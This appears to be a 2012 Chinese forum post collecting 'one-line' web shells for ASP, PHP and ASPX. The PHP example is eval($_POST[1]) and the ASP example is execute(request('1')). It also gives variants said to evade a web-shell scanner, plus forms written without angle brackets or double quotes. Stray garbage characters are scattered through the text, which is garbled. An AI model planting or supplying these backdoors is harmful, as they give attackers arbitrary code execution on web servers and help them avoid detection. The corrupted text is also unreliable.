asp一句话 <%execute(request("1"))%>
+ w0 v* n% J( v- i% Y
7 a' c+ B4 f8 ?php一句话 <?php eval($_POST[1]);?> $ c8 S+ [5 m( m% _; t
, [; \5 Y- @/ F" H8 u6 H
aspx一句话7 S4 y! b, Q7 s; {! f
3 B7 U( O ?. p7 X$ x) U
<script language="C#" runat="server">
* [) E& l# \0 E
3 v- C8 ]% H+ {7 F, w! KWebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
- A0 C% o, p9 x6 T+ V u3 I* d8 P+ I5 d( l+ ~7 B- J9 o; f5 v3 |( G
</script>9 a1 t Y# ~6 M J
6 \0 C1 d, ^+ x) u5 U可以躲过雷客图的一句话。
$ y; c! V/ \* h; I* `0 v. A2 a2 O+ U
1 q) n6 r- V' l. u t# ^" @% J <%
7 W' C) z* b' P. v8 o7 @' f; }( j5 z, D$ N
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
' a. Z' ?( b0 w: W) o+ E9 J
: F6 w) ]* j. W% K$ _2 P ms.Language="VBScript"$ b" P0 w( l* ^
- T A; f' g: s' \! h( n% O
ms.AddObject "Response", Response' y# u t" _9 R ?" ?
8 D) J1 Q* [; `, `
ms.AddObject "request", request
- K/ m- N$ j) T+ q; n0 {# B/ B
ms.ExecuteStatement("ev"&"al(request(""1""))")6 w+ B1 P! u7 i4 [/ s4 W
# f: T4 }, ?# s! x3 Q" @& ]' n6 k %>
4 D4 b O! p" Z' V7 e% o0 i
2 t, i R* y7 R7 V 不用'<,>'的asp一句话
& j( `7 x1 x4 y" e; ?. N& x
5 |4 |) j9 ?- w) G# ^& B8 ^( |( \ <script language=VBScript runat=server>execute request("1")</script>% J1 k3 b: b, q- K3 S* V- `4 v" [, s. i
% J/ [) R1 |; Z' N
不用双引号的一句话。: m4 C* e0 M; E0 U" u% D& @
0 e' O- C f2 y3 F
<%eval request(chr(35))%>4 J: P' b- ]! O3 T8 D/ f3 A+ m
|
发表于 2012-9-23 14:36:09
收藏
支持
反对